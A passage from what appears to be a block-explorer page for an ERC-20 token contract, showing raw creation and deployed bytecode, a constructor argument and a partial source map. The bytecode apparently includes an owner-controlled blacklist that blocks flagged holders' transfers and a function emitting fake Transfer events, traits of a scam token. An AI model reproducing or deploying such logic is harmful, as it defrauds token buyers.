250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561192a576119296118b0565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061196f82611434565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156119a2576119a16118b0565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611a0960258361131c565b9150611a14826119ad565b604082019050919050565b60006020820190508181036000830152611a38816119fc565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a9b60268361131c565b9150611aa682611a3f565b604082019050919050565b60006020820190508181036000830152611aca81611a8e565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611b2d60248361131c565b9150611b3882611ad1565b604082019050919050565b60006020820190508181036000830152611b5c81611b20565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611bbf60228361131c565b9150611bca82611b63565b604082019050919050565b60006020820190508181036000830152611bee81611bb2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611c2b601b8361131c565b9150611c3682611bf5565b602082019050919050565b60006020820190508181036000830152611c5a81611c1e565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611cbd60258361131c565b9150611cc882611c61565b604082019050919050565b60006020820190508181036000830152611cec81611cb0565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d4f60238361131c565b9150611d5a82611cf3565b604082019050919050565b60006020820190508181036000830152611d7e81611d42565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611de160268361131c565b9150611dec82611d85565b604082019050919050565b60006020820190508181036000830152611e1081611dd4565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e7360218361131c565b9150611e7e82611e17565b604082019050919050565b60006020820190508181036000830152611ea281611e66565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f0560228361131c565b9150611f1082611ea9565b604082019050919050565b60006020820190508181036000830152611f3481611ef8565b9050919050565b6000611f4682611434565b9150611f5183611434565b925082821015611f6457611f636118b0565b5b828203905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611fa560208361131c565b9150611fb082611f6f565b602082019050919050565b60006020820190508181036000830152611fd481611f98565b905091905056fea2646970667358221220799d1334319f5d743372709712336c5b36edfe94fa413ac67b966552b52894b664736f6c634300080a00330000000000000000000000006629c3e0683852fac30b6b33395c2d91c8589258

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102cf578063a9059cbb146102ff578063dd62ed3e1461032f578063f2fde38b1461035f578063f55332ab1461037b57610116565b8063715018a61461026d5780638da5cb5b1461027757806395d89b411461029557806398ee66c5146102b357610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d557806342966c68146102055780635178624c1461022157806370a082311461023d57610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b6101236103ab565b60405161013091906113aa565b60405180910390f35b610153600480360381019061014e919061146a565b61043d565b60405161016091906114c5565b60405180910390f35b61017161045b565b60405161017e91906114ef565b60405180910390f35b6101a1600480360381019061019c919061150a565b610465565b6040516101ae91906114c5565b60405180910390f35b6101bf61055d565b6040516101cc9190611579565b60405180910390f35b6101ef60048036038101906101ea919061146a565b610566565b6040516101fc91906114c5565b60405180910390f35b61021f600480360381019061021a9190611594565b610612565b005b61023b60048036038101906102369190611652565b610626565b005b610257600480360381019061025291906116b2565b6106d3565b60405161026491906114ef565b60405180910390f35b61027561071c565b005b61027f610730565b60405161028c91906116ee565b60405180910390f35b61029d61075a565b6040516102aa91906113aa565b60405180910390f35b6102cd60048036038101906102c89190611709565b6107ec565b005b6102e960048036038101906102e4919061146a565b6108a8565b6040516102f691906114c5565b60405180910390f35b6103196004803603810190610314919061146a565b610993565b60405161032691906114c5565b60405180910390f35b6103496004803603810190610344919061177d565b6109b1565b60405161035691906114ef565b60405180910390f35b610379600480360381019061037491906116b2565b610a38565b005b610395600480360381019061039091906116b2565b610abc565b6040516103a291906114c5565b60405180910390f35b6060600580546103ba906117ec565b80601f01602080910402602001604051908101604052809291908181526020018280546103e6906117ec565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610b12565b8484610b1a565b6001905092915050565b6000600754905090565b6000610472848484610ce5565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006104bd610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561053d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161053490611890565b60405180910390fd5b61055185610549610b12565b858403610b1a565b60019150509392505050565b60006009905090565b6000610608610573610b12565b848460036000610581610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461060391906118df565b610b1a565b6001905092915050565b61062361061d610b12565b82610ff6565b50565b61062e6111b7565b60005b838390508110156106cd57816004600086868581811061065457610653611935565b5b905060200201602081019061066991906116b2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106c590611964565b915050610631565b50505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107246111b7565b61072e600061124b565b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610769906117ec565b80601f0160208091040260200160405190810160405280929190818152602001828054610795906117ec565b80156107e25780601f106107b7576101008083540402835291602001916107e2565b820191906000526020600020905b8154815290600101906020018083116107c557829003601f168201915b5050505050905090565b6107f46111b7565b60005b848490508110156108a15784848281811061081557610814611935565b5b905060200201602081019061082a91906116b2565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161088691906114ef565b60405180910390a3808061089990611964565b9150506107f7565b5050505050565b600080600360006108b7610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610974576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161096b90611a1f565b60405180910390fd5b61098861097f610b12565b85858403610b1a565b600191505092915050565b60006109a76109a0610b12565b8484610ce5565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a406111b7565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610ab0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa790611ab1565b60405180910390fd5b610ab98161124b565b50565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b8a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8190611b43565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610bfa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf190611bd5565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cd891906114ef565b60405180910390a3505050565b60008111610d28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1f90611c41565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d98576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d8f90611cd3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dff90611d65565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8690611df7565b60405180910390fd5b600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610eef5760008214610eee57600080fd5b5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f8491906118df565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fe891906114ef565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611066576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105d90611e89565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156110ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e490611f1b565b60405180910390fd5b818103600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600760008282546111459190611f3b565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111aa91906114ef565b60405180910390a3505050565b6000806111c2610b12565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611249576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161124090611fbb565b60405180910390fd5b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561134b578082015181840152602081019050611330565b8381111561135a576000848401525b50505050565b6000601f19601f8301169050919050565b600061137c82611311565b611386818561131c565b935061139681856020860161132d565b61139f81611360565b840191505092915050565b600060208201905081810360008301526113c48184611371565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611401826113d6565b9050919050565b611411816113f6565b811461141c57600080fd5b50565b60008135905061142e81611408565b92915050565b6000819050919050565b61144781611434565b811461145257600080fd5b50565b6000813590506114648161143e565b92915050565b60008060408385031215611481576114806113cc565b5b600061148f8582860161141f565b92505060206114a085828601611455565b9150509250929050565b60008115159050919050565b6114bf816114aa565b82525050565b60006020820190506114da60008301846114b6565b92915050565b6114e981611434565b82525050565b600060208201905061150460008301846114e0565b92915050565b600080600060608486031215611523576115226113cc565b5b60006115318682870161141f565b93505060206115428682870161141f565b925050604061155386828701611455565b9150509250925092565b600060ff82169050919050565b6115738161155d565b82525050565b600060208201905061158e600083018461156a565b92915050565b6000602082840312156115aa576115a96113cc565b5b60006115b884828501611455565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126115e6576115e56115c1565b5b8235905067ffffffffffffffff811115611603576116026115c6565b5b60208301915083602082028301111561161f5761161e6115cb565b5b9250929050565b61162f816114aa565b811461163a57600080fd5b50565b60008135905061164c81611626565b92915050565b60008060006040848603121561166b5761166a6113cc565b5b600084013567ffffffffffffffff811115611689576116886113d1565b5b611695868287016115d0565b935093505060206116a88682870161163d565b9150509250925092565b6000602082840312156116c8576116c76113cc565b5b60006116d68482850161141f565b91505092915050565b6116e8816113f6565b82525050565b600060208201905061170360008301846116df565b92915050565b60008060008060608587031215611723576117226113cc565b5b600085013567ffffffffffffffff811115611741576117406113d1565b5b61174d878288016115d0565b945094505060206117608782880161141f565b925050604061177187828801611455565b91505092959194509250565b60008060408385031215611794576117936113cc565b5b60006117a28582860161141f565b92505060206117b38582860161141f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061180457607f821691505b60208210811415611818576118176117bd565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b600061187a60288361131c565b91506118858261181e565b604082019050919050565b600060208201905081810360008301526118a98161186d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006118ea82611434565b91506118f583611434565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561192a576119296118b0565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061196f82611434565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156119a2576119a16118b0565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611a0960258361131c565b9150611a14826119ad565b604082019050919050565b60006020820190508181036000830152611a38816119fc565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a9b60268361131c565b9150611aa682611a3f565b604082019050919050565b60006020820190508181036000830152611aca81611a8e565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611b2d60248361131c565b9150611b3882611ad1565b604082019050919050565b60006020820190508181036000830152611b5c81611b20565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611bbf60228361131c565b9150611bca82611b63565b604082019050919050565b60006020820190508181036000830152611bee81611bb2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611c2b601b8361131c565b9150611c3682611bf5565b602082019050919050565b60006020820190508181036000830152611c5a81611c1e565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611cbd60258361131c565b9150611cc882611c61565b604082019050919050565b60006020820190508181036000830152611cec81611cb0565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d4f60238361131c565b9150611d5a82611cf3565b604082019050919050565b60006020820190508181036000830152611d7e81611d42565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611de160268361131c565b9150611dec82611d85565b604082019050919050565b60006020820190508181036000830152611e1081611dd4565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e7360218361131c565b9150611e7e82611e17565b604082019050919050565b60006020820190508181036000830152611ea281611e66565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f0560228361131c565b9150611f1082611ea9565b604082019050919050565b60006020820190508181036000830152611f3481611ef8565b9050919050565b6000611f4682611434565b9150611f5183611434565b925082821015611f6457611f636118b0565b5b828203905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611fa560208361131c565b9150611fb082611f6f565b602082019050919050565b60006020820190508181036000830152611fd481611f98565b905091905056fea2646970667358221220799d1334319f5d743372709712336c5b36edfe94fa413ac67b966552b52894b664736f6c634300080a0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000006629c3e0683852fac30b6b33395c2d91c8589258

-----Decoded View---------------
Arg [0] : _stakingReserveAddr (address): 0x6629C3E0683852fac30B6B33395C2d91C8589258

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000006629c3e0683852fac30b6b33395c2d91c8589258


Deployed Bytecode Sourcemap

5545:8420:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6323:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8520:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6938:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8993:426;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6742:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9752:190;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13020:79;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12676:184;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7218:121;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5027:103;;;:::i;:::-;;4796:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6520:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13667:182;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10260:370;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7619:165;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8072:133;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5138:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13855:107;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6323:94;6377:13;6406:5;6399:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6323:94;:::o;8520:149::-;8598:4;8611:34;8620:12;:10;:12::i;:::-;8634:2;8638:6;8611:8;:34::i;:::-;8659:4;8652:11;;8520:149;;;;:::o;6938:102::-;6999:7;7022:12;;7015:19;;6938:102;:::o;8993:426::-;9099:4;9112:36;9122:6;9130:9;9141:6;9112:9;:36::i;:::-;9157:24;9184:11;:19;9196:6;9184:19;;;;;;;;;;;;;;;:33;9204:12;:10;:12::i;:::-;9184:33;;;;;;;;;;;;;;;;9157:60;;9252:6;9232:16;:26;;9224:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;9329:57;9338:6;9346:12;:10;:12::i;:::-;9379:6;9360:16;:25;9329:8;:57::i;:::-;9409:4;9402:11;;;8993:426;;;;;:::o;6742:94::-;6800:5;5875:1;6814:16;;6742:94;:::o;9752:190::-;9835:4;9848:70;9857:12;:10;:12::i;:::-;9871:2;9907:10;9875:11;:25;9887:12;:10;:12::i;:::-;9875:25;;;;;;;;;;;;;;;:29;9901:2;9875:29;;;;;;;;;;;;;;;;:42;;;;:::i;:::-;9848:8;:70::i;:::-;9932:4;9925:11;;9752:190;;;;:::o;13020:79::-;13066:27;13072:12;:10;:12::i;:::-;13086:6;13066:5;:27::i;:::-;13020:79;:::o;12676:184::-;4755:13;:11;:13::i;:::-;12757:9:::1;12752:103;12776:4;;:11;;12772:1;:15;12752:103;;;12844:3;12809:23;:32;12833:4;;12838:1;12833:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;12809:32;;;;;;;;;;;;;;;;:38;;;;;;;;;;;;;;;;;;12789:3;;;;;:::i;:::-;;;;12752:103;;;;12676:184:::0;;;:::o;7218:121::-;7292:7;7315:9;:18;7325:7;7315:18;;;;;;;;;;;;;;;;7308:25;;7218:121;;;:::o;5027:103::-;4755:13;:11;:13::i;:::-;5092:30:::1;5119:1;5092:18;:30::i;:::-;5027:103::o:0;4796:87::-;4842:7;4869:6;;;;;;;;;;;4862:13;;4796:87;:::o;6520:98::-;6576:13;6605:7;6598:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6520:98;:::o;13667:182::-;4755:13;:11;:13::i;:::-;13758:9:::1;13753:91;13777:4;;:11;;13773:1;:15;13753:91;;;13823:4;;13828:1;13823:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;13811:25;;13820:1;13811:25;;;13832:3;13811:25;;;;;;:::i;:::-;;;;;;;;13790:3;;;;;:::i;:::-;;;;13753:91;;;;13667:182:::0;;;;:::o;10260:370::-;10348:4;10361:24;10388:11;:25;10400:12;:10;:12::i;:::-;10388:25;;;;;;;;;;;;;;;:29;10414:2;10388:29;;;;;;;;;;;;;;;;10361:56;;10452:15;10432:16;:35;;10424:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;10535:62;10544:12;:10;:12::i;:::-;10558:2;10581:15;10562:16;:34;10535:8;:62::i;:::-;10620:4;10613:11;;;10260:370;;;;:::o;7619:165::-;7705:4;7718:42;7728:12;:10;:12::i;:::-;7742:9;7753:6;7718:9;:42::i;:::-;7774:4;7767:11;;7619:165;;;;:::o;8072:133::-;8155:7;8178:11;:17;8190:4;8178:17;;;;;;;;;;;;;;;:21;8196:2;8178:21;;;;;;;;;;;;;;;;8171:28;;8072:133;;;;:::o;5138:201::-;4755:13;:11;:13::i;:::-;5247:1:::1;5227:22;;:8;:22;;;;5219:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;5303:28;5322:8;5303:18;:28::i;:::-;5138:201:::0;:::o;13855:107::-;13905:4;13925:23;:31;13949:6;13925:31;;;;;;;;;;;;;;;;;;;;;;;;;13918:38;;13855:107;;;:::o;3727:98::-;3780:7;3807:10;3800:17;;3727:98;:::o;13357:304::-;13465:1;13449:18;;:4;:18;;;;13441:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;13537:1;13523:16;;:2;:16;;;;13515:63;;;;;;;;;;;;:::i;:::-;;;;;;;;;13611:6;13587:11;:17;13599:4;13587:17;;;;;;;;;;;;;;;:21;13605:2;13587:21;;;;;;;;;;;;;;;:30;;;;13644:2;13629:26;;13638:4;13629:26;;;13648:6;13629:26;;;;;;:::i;:::-;;;;;;;;13357:304;;;:::o;10886:677::-;10997:1;10988:6;:10;10980:50;;;;;;;;;;;;:::i;:::-;;;;;;;;;11063:1;11045:20;;:6;:20;;;;11037:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;11143:1;11122:23;;:9;:23;;;;11114:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;11194:21;11218:9;:17;11228:6;11218:17;;;;;;;;;;;;;;;;11194:41;;11267:6;11250:13;:23;;11242:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;11326:23;:31;11350:6;11326:31;;;;;;;;;;;;;;;;;;;;;;;;;11323:74;;;11387:1;11377:6;:11;11369:20;;;;;;11323:74;11458:6;11442:13;:22;11422:9;:17;11432:6;11422:17;;;;;;;;;;;;;;;:42;;;;11502:6;11478:9;:20;11488:9;11478:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;11539:9;11522:35;;11531:6;11522:35;;;11550:6;11522:35;;;;;;:::i;:::-;;;;;;;;10973:590;10886:677;;;:::o;12238:432::-;12337:1;12318:21;;:7;:21;;;;12310:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;12386:22;12411:9;:18;12421:7;12411:18;;;;;;;;;;;;;;;;12386:43;;12462:6;12444:14;:24;;12436:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;12571:6;12554:14;:23;12533:9;:18;12543:7;12533:18;;;;;;;;;;;;;;;:44;;;;12607:6;12591:12;;:22;;;;;;;:::i;:::-;;;;;;;;12653:1;12627:37;;12636:7;12627:37;;;12657:6;12627:37;;;;;;:::i;:::-;;;;;;;;12303:367;12238:432;;:::o;4891:128::-;4955:5;:19;4961:12;:10;:12::i;:::-;4955:19;;;;;;;;;;;;;;;;;;;;;;;;;4947:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;4891:128::o;5347:191::-;5421:16;5440:6;;;;;;;;;;;5421:25;;5466:8;5457:6;;:17;;;;;;;;;;;;;;;;;;5521:8;5490:40;;5511:8;5490:40;;;;;;;;;;;;5410:128;5347:191;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:307::-;355:1;365:113;379:6;376:1;373:13;365:113;;;464:1;459:3;455:11;449:18;445:1;440:3;436:11;429:39;401:2;398:1;394:10;389:15;;365:113;;;496:6;493:1;490:13;487:101;;;576:1;567:6;562:3;558:16;551:27;487:101;336:258;287:307;;;:::o;600:102::-;641:6;692:2;688:7;683:2;676:5;672:14;668:28;658:38;;600:102;;;:::o;708:364::-;796:3;824:39;857:5;824:39;:::i;:::-;879:71;943:6;938:3;879:71;:::i;:::-;872:78;;959:52;1004:6;999:3;992:4;985:5;981:16;959:52;:::i;:::-;1036:29;1058:6;1036:29;:::i;:::-;1031:3;1027:39;1020:46;;800:272;708:364;;;;:::o;1078:313::-;1191:4;1229:2;1218:9;1214:18;1206:26;;1278:9;1272:4;1268:20;1264:1;1253:9;1249:17;1242:47;1306:78;1379:4;1370:6;1306:78;:::i;:::-;1298:86;;1078:313;;;;:::o;1478:117::-;1587:1;1584;1577:12;1601:117;1710:1;1707;1700:12;1724:126;1761:7;1801:42;1794:5;1790:54;1779:65;;1724:126;;;:::o;1856:96::-;1893:7;1922:24;1940:5;1922:24;:::i;:::-;1911:35;;1856:96;;;:::o;1958:122::-;2031:24;2049:5;2031:24;:::i;:::-;2024:5;2021:35;2011:63;;2070:1;2067;2060:12;2011:63;1958:122;:::o;2086:139::-;2132:5;2170:6;2157:20;2148:29;;2186:33;2213:5;2186:33;:::i;:::-;2086:139;;;;:::o;2231:77::-;2268:7;2297:5;2286:16;;2231:77;;;:::o;2314:122::-;2387:24;2405:5;2387:24;:::i;:::-;2380:5;2377:35;2367:63;;2426:1;2423;2416:12;2367:63;2314:122;:::o;2442:139::-;2488:5;2526:6;2513:20;2504:29;;2542:33;2569:5;2542:33;:::i;:::-;2442:139;;;;:::o;2587:474::-;2655:6;2663;2712:2;2700:9;2691:7;2687:23;2683:32;2680:119;;;2718:79;;:::i;:::-;2680:119;2838:1;2863:53;2908:7;2899:6;2888:9;2884:22;2863:53;:::i;:::-;2853:63;;2809:117;2965:2;2991:53;3036:7;3027:6;3016:9;3012:22;2991:53;:::i;:::-;2981:63;;2936:118;2587:474;;;;;:::o;3067:90::-;3101:7;3144:5;3137:13;3130:21;3119:32;;3067:90;;;:::o;3163:109::-;3244:21;3259:5;3244:21;:::i;:::-;3239:3;3232:34;3163:109;;:::o;3278:210::-;3365:4;3403:2;3392:9;3388:18;3380:26;;3416:65;3478:1;3467:9;3463:17;3454:6;3416:65;:::i;:::-;3278:210;;;;:::o;3494:118::-;3581:24;3599:5;3581:24;:::i;:::-;3576:3;3569:37;3494:118;;:::o;3618:222::-;3711:4;3749:2;3738:9;3734:18;3726:26;;3762:71;3830:1;3819:9;3815:17;3806:6;3762:71;:::i;:::-;3618:222;;;;:::o;3846:619::-;3923:6;3931;3939;3988:2;3976:9;3967:7;3963:23;3959:32;3956:119;;;3994:79;;:::i;:::-;3956:119;4114:1;4139:53;4184:7;4175:6;4164:9;4160:22;4139:53;:::i;:::-;4129:63;;4085:117;4241:2;4267:53;4312:7;4303:6;4292:9;4288:22;4267:53;:::i;:::-;4257:63;;4212:118;4369